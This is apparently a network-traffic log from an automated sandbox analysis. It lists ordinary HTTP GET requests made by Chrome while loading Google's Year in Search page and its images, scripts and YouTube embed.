    Source: global trafficHTTP traffic detected: GET /assets-stories-2021/css/index.min.css?cache=9e0af63 HTTP/1.1Host: about.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://about.google/stories/year-in-search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.2074760332.1679378274; _gat_UA-69658807-1=1; _gat_UA-69658807-2=1; _ga=GA1.2.2144369805.1679378274; _ga_YGRLMNPG7B=GS1.1.1679378274.1.0.1679378284.0.0.0
    Source: global trafficHTTP traffic detected: GET /assets-stories-2021/css/year-in-search.min.css?cache=fc7fdb8 HTTP/1.1Host: about.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://about.google/stories/year-in-search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.2074760332.1679378274; _gat_UA-69658807-1=1; _gat_UA-69658807-2=1; _ga=GA1.2.2144369805.1679378274; _ga_YGRLMNPG7B=GS1.1.1679378274.1.0.1679378284.0.0.0
    Source: global trafficHTTP traffic detected: GET /assets-stories-2021/js/polyfills.min.js?cache=8b7cf26 HTTP/1.1Host: about.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.google/stories/year-in-search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.2074760332.1679378274; _gat_UA-69658807-1=1; _gat_UA-69658807-2=1; _ga=GA1.2.2144369805.1679378274; _ga_YGRLMNPG7B=GS1.1.1679378274.1.0.1679378284.0.0.0
    Source: global trafficHTTP traffic detected: GET /assets-stories-2021/img/glue-icons.svg HTTP/1.1Host: about.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: imageReferer: https://about.google/stories/year-in-search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.2074760332.1679378274; _gat_UA-69658807-1=1; _gat_UA-69658807-2=1; _ga=GA1.2.2144369805.1679378274; _ga_YGRLMNPG7B=GS1.1.1679378274.1.0.1679378284.0.0.0
    Source: global trafficHTTP traffic detected: GET /KR_tQgFYSc-6pG6sf0J8cb59cuL0GF_z76spHvHO-HAPqX8Fo_CNhJ3FfBIMJ0MLqmMERINkaPYQLUV-D4y3MtNNQcjaldjUU9KJtcprio0VKAmgeko HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets-stories-2021/js/index.min.js?cache=e360a66 HTTP/1.1Host: about.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.google/stories/year-in-search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.2074760332.1679378274; _gat_UA-69658807-1=1; _gat_UA-69658807-2=1; _ga=GA1.2.2144369805.1679378274; _ga_YGRLMNPG7B=GS1.1.1679378274.1.0.1679378284.0.0.0
    Source: global trafficHTTP traffic detected: GET /assets-stories-2021/img/glue-google-color-logo.svg HTTP/1.1Host: about.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/stories/year-in-search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.2074760332.1679378274; _gat_UA-69658807-1=1; _gat_UA-69658807-2=1; _ga=GA1.2.2144369805.1679378274; _ga_YGRLMNPG7B=GS1.1.1679378274.1.0.1679378284.0.0.0
    Source: global trafficHTTP traffic detected: GET /QEMbwo7Ti8RLlXgjwI3XmLofgQarTUsJhdlzW3qmjsweqEBVZQybyhODbfGRBJKkpnbEkzZUxCMBcqATjh5XFT6SsxA46apOCAbnRUWmitINMI_VT5w?=w1440=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets-stories-2021/img/glue-icon-expand-more.svg HTTP/1.1Host: about.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/stories/year-in-search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.2074760332.1679378274; _gat_UA-69658807-1=1; _gat_UA-69658807-2=1; _ga=GA1.2.2144369805.1679378274; _ga_YGRLMNPG7B=GS1.1.1679378274.1.0.1679378284.0.0.0
    Source: global trafficHTTP traffic detected: GET /assets-stories-2021/img/glue-google-solid-logo.svg HTTP/1.1Host: about.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/stories/year-in-search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.2074760332.1679378274; _gat_UA-69658807-1=1; _gat_UA-69658807-2=1; _ga=GA1.2.2144369805.1679378274; _ga_YGRLMNPG7B=GS1.1.1679378274.1.0.1679378284.0.0.0
    Source: global trafficHTTP traffic detected: GET /W02GUnHtaJPHRSBIq-gNVwuGPX9s4KcNRuen0qIqjAhxQgTZPoA5l3bs_K-dOeEhDWsLHHzANblqcGHaKRU-58O_0VGUJuRld3LCDpHDb4atFHUnIOz9 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ns1RQ15FvvYxdGQzVgZfBQLSVnr2dO10vjsXSMb6ob9Y8YnH_NwT86CExwRLcJ_pgu-yapMF-ijuKF3eZd51wxCF8feR0U8yU7Zpj9P8nuKgU6HLt7k?=w1440 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets-stories-2021/img/glue-help.svg HTTP/1.1Host: about.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/stories/year-in-search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.2074760332.1679378274; _gat_UA-69658807-1=1; _gat_UA-69658807-2=1; _ga=GA1.2.2144369805.1679378274; _ga_YGRLMNPG7B=GS1.1.1679378274.1.0.1679378284.0.0.0
    Source: global trafficHTTP traffic detected: GET /cdV5k2CEOt0uTjlBHAvabhD5qdKLXLKLAHXaT59mzVC-6Nz3asgWUkFuqlrTilXv4nvWSo0HMurxuGOILE22pGMRt7Nl36R0D_GZOKL-qlOs0LNyug?=w1440 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /knzdaC9H3UsDyJYIxRR90Ngh5TdE57GkEDMlgpbT7fO_u8Dmh3l3VmWAzxyxtOBM8x3Lw_lxvIO5Ph27fDNB1L9p-EWaog2Ji6b2lw HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /iHqzYEhiw5A9ZGZIu3rGSAQPgXPHm_Hs6Svm6nEgURlbUDdNE-1gOmOW81l6kRMf1pziEJWK41YXQVVxQOZl3OF0Oy-a_nYl7NFKyzpep_RjmcBlh54?=w1440 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /iERG8EH9e9XNAoJGd1L4YhzMT0pLQmWs9wFRF2HU1-AOX7fgqQaVhKPr9SYCgWHFKw6nbLbToncl4pLOYqKuSDuVFsOBD8SebDFlTUGudVnQ_04QG6M HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wCGOhL6icJWSXcsnHRdh9OYFq7sksI8mbSz9Dy2dWn4QBEt_46Recz7sZTjLZOfZ4oOOwQj0WZEW2GjUKChL3CpGQcAIt0L2PqQVwNdsJeTtNeyf9b0?=w1440 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /TYyhtgs6po_zT3exdwvm3xqA-J_-scIhbNvmNQHFNs87MSWcwWtaoQYJdvcuI8VF967PFWWGsKVcevUYTygdwHcdvxLVprxS5wEf-58iDfNjLH9UiSlF HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /tD_w389S4CFuR3LEnia0XnPrkuW6fWmQ2PBUrWJdmmAr8VNpsiVssfVzWTcZ6tRdKiThCpGubjas3ibI58FTlcUGnD8m_X7L9jgNeo07i12huWjZkqK1 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /tXssN0AcrlblKe6BUWhLJqgTDHdLLVy7OYiagJrHQJONSwFZFDHeAd-BCUQ5G449--R80fEJtGX1Ucz6p3ce6U_3FGCfkkKO4Xxi0ihF21fVarvUV4E HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /DadS_3zeQeDcl8UL1JN5Fde-_q5NFV2n6-0So7Ylpd00U0i3zhPXRGJJv98HlfKif4nPzY73AoYQWeuX55cYuZ0Puc45APIrNEYbdmsYLJhpI0sBXLk HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /iframe_api HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /l7tWDOsi7vv4CzF9xthvpZ14buBNB2c0gFrQXm2_OehYVnKqtdVTGg3mHM--_LCDXEhNHMoz336hier2hdWEx7AyW7lonhg7WSTRmfkonmDBtFXsiLs HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /dd86GfBmU80zX_gBKX8vD3jcolry9sjlvguaakt0t7oc8jZtX3XUUyDMyDSvIhEIobxWhNnjm1DsTU5E6q3I_WoKgfOYLhDzTMF8dm59Kpg0gLhxn8M HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1lqAjjXuM384j0EfDi9U8Y1AfDe6nru7uxUwfMH-vyeD2aQLqvhxh8FuWbqfb-zhjhuSyljoATt1NjEGmRCbjbFE6XA1Fdb_oHWJNgGMxwFp_Dha8Eo HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /5ZZkQavSKPzPcj4vg-8DqCs2qofs9BZIzfFtSeY8NlqF4d0bWophZMqW4SSg-MKquK6C5VBTC9dXE1YS5PkUXjlIY9GLFaiLBO3_ywWzKiEqGn_cgQMT HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /stOglKI-L-Qw2zjHiiBtJk-yD5dWHmciNUALJQaoDW3z2hYAuVAIPlkd_vOOf5CmAxq4YKb6K1J-Hpek77sA9Riju8yhwu1TFn3SwcIPJxiQdStnYgg HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /s/player/59acb1f3/www-widgetapi.vflset/www-widgetapi.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
